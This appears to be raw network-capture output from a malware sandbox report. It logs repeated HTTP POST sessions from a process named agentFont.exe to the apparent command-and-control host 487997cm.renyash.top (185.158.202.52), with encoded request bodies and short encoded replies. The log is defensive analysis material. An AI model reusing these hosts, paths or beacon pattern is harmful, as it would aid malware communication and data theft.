                                                                                  Jan 1, 2025 11:28:39.374566078 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:39.502769947 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:35 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  104 | 192.168.2.4 | 50097 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:38.874849081 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:39.221731901 CET | 1044 | OUT | request body
                                                                                  Jan 1, 2025 11:28:39.515398979 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:39.642832994 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  105 | 192.168.2.4 | 50103 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:39.908104897 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:40.252862930 CET | 1044 | OUT | request body
                                                                                  Jan 1, 2025 11:28:40.542334080 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:40.669621944 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  106 | 192.168.2.4 | 50109 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:40.800342083 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:41.159135103 CET | 1044 | OUT | request body
                                                                                  Jan 1, 2025 11:28:41.455328941 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:41.589824915 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  107 | 192.168.2.4 | 50110 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:41.723268032 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:42.080957890 CET | 1044 | OUT | request body
                                                                                  Jan 1, 2025 11:28:42.368954897 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:42.503799915 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  108 | 192.168.2.4 | 50111 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:42.630732059 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:42.987246990 CET | 1040 | OUT | request body
                                                                                  Jan 1, 2025 11:28:43.266748905 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:43.394083977 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  109 | 192.168.2.4 | 50112 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:43.521506071 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:43.877931118 CET | 1044 | OUT | Data Raw: 54 5a 5d 53 51 47 50 5e 59 5f 5b 52 5a 59 59 50 55 5e 54 59 51 5d 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZ]SQGP^Y_[RZYYPU^TYQ][X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?9W4=[1->B:=;U%<1'Z9651$/='6-Y(*&X"#\.$
                                                                                  Jan 1, 2025 11:28:44.168078899 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:44.300147057 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:40 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  110 | 192.168.2.4 | 50113 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:44.429126024 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  111 | 192.168.2.4 | 50114 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:44.524600983 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:44.877814054 CET | 1340 | OUT | Data Raw: 51 52 58 59 51 43 50 5a 59 5f 5b 52 5a 5e 59 5c 55 5e 54 5b 51 5a 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QRXYQCPZY_[RZ^Y\U^T[QZ[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.[(2.">+1>&D:W%?Y',.X"-Q$?=>''6=1+*&X"#\.8
                                                                                  Jan 1, 2025 11:28:45.160754919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:45.293951035 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 24 00 3d 36 37 11 24 5d 25 57 33 2d 33 12 28 30 2a 11 2f 2c 22 03 26 29 3f 01 2b 23 0a 09 3f 2b 35 07 3c 13 30 5a 31 0c 3c 51 32 35 2a 51 00 1c 23 5a 3c 28 3b 59 3c 3b 36 55 2a 22 37 17 28 12 19 12 36 04 02 0e 24 3b 3e 53 25 3e 37 5d 2b 06 2c 1d 3b 26 34 07 2f 30 30 00 24 1c 2f 52 09 14 21 5c 29 55 3b 13 25 0b 21 03 27 23 3b 11 36 16 02 0e 37 32 2d 12 37 33 02 01 3c 04 34 01 21 1f 08 58 31 2c 22 41 3f 03 27 52 22 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: $=67$]%W3-3(0*/,"&)?+#?+5<0Z1<Q25*Q#Z<(;Y<;6U*"7(6$;>S%>7]+,;&4/00$/R!\)U;%!'#;672-73<4!X1,"A?'R">#T,#V6]Q


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  112 | 192.168.2.4 | 50115 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:44.692301035 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:45.049776077 CET | 1044 | OUT | Data Raw: 51 51 58 58 54 41 55 5c 59 5f 5b 52 5a 58 59 52 55 5f 54 5c 51 5b 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQXXTAU\Y_[RZXYRU_T\Q[[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?T5#/2%-;U%/0"_"%!U$=3Z5&(*&X"#\.
                                                                                  Jan 1, 2025 11:28:45.338648081 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:45.472076893 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  113 | 192.168.2.4 | 50116 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:45.599981070 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:45.956048012 CET | 1040 | OUT | Data Raw: 54 52 5d 5c 51 47 55 5c 59 5f 5b 52 5a 5a 59 51 55 52 54 50 51 5f 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TR]\QGU\Y_[RZZYQURTPQ_[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<2= > Y$>5982$Z*"6-Q$/-)$,#=9\):&X"#\.8
                                                                                  Jan 1, 2025 11:28:46.246614933 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:46.376025915 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  114 | 192.168.2.4 | 50117 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:46.504944086 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:46.862317085 CET | 1044 | OUT | Data Raw: 51 52 58 58 54 46 50 5d 59 5f 5b 52 5a 59 59 55 55 5f 54 50 51 50 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QRXXTFP]Y_[RZYYUU_TPQP[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^<"-7-%[!,=/U%<%0*Z5P$?6)3"[9X?:&X"#\.$
                                                                                  Jan 1, 2025 11:28:47.169817924 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:47.303683043 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:43 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  115 | 192.168.2.4 | 50118 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:47.439191103 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:47.784075022 CET | 1044 | OUT | Data Raw: 54 56 5d 59 54 44 55 58 59 5f 5b 52 5a 5d 59 5c 55 56 54 5b 51 5f 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TV]YTDUXY_[RZ]Y\UVT[Q_[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.[<"V7.82*@:>4%?X':#&1T$/6)$ "[9+:&X"#\.
                                                                                  Jan 1, 2025 11:28:48.095383883 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:48.230083942 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  116 | 192.168.2.4 | 50119 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:48.349703074 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:48.707029104 CET | 1044 | OUT | Data Raw: 51 57 58 59 51 41 55 5f 59 5f 5b 52 5a 5d 59 5d 55 51 54 5f 51 5b 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QWXYQAU_Y_[RZ]Y]UQT_Q[[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\?26#[#&-@:%$,":0,5S*;59?:&X"#\.
                                                                                  Jan 1, 2025 11:28:48.990111113 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:49.122952938 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:45 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  117 | 192.168.2.4 | 50120 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:49.257076979 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:49.612207890 CET | 1044 | OUT | Data Raw: 51 52 58 5e 54 42 55 50 59 5f 5b 52 5a 5e 59 57 55 55 54 58 51 59 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QRX^TBUPY_[RZ^YWUUTXQY[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?54$=*:>/S2&_0Y6%'R)<![!X+&X"#\.8
                                                                                  Jan 1, 2025 11:28:49.904753923 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:50.040101051 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:46 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  118 | 192.168.2.4 | 50121 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:50.180238962 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  119 | 192.168.2.4 | 50122 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:50.307903051 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1312
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:50.659172058 CET | 1312 | OUT | Data Raw: 54 50 5d 53 54 44 50 5a 59 5f 5b 52 5a 5d 59 56 55 53 54 5f 51 51 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TP]STDPZY_[RZ]YVUST_QQ[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(5S7=,1%-/U2?X$<X6%P'*'?#=Y+&X"#\.
                                                                                  Jan 1, 2025 11:28:50.973311901 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:51.107789040 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
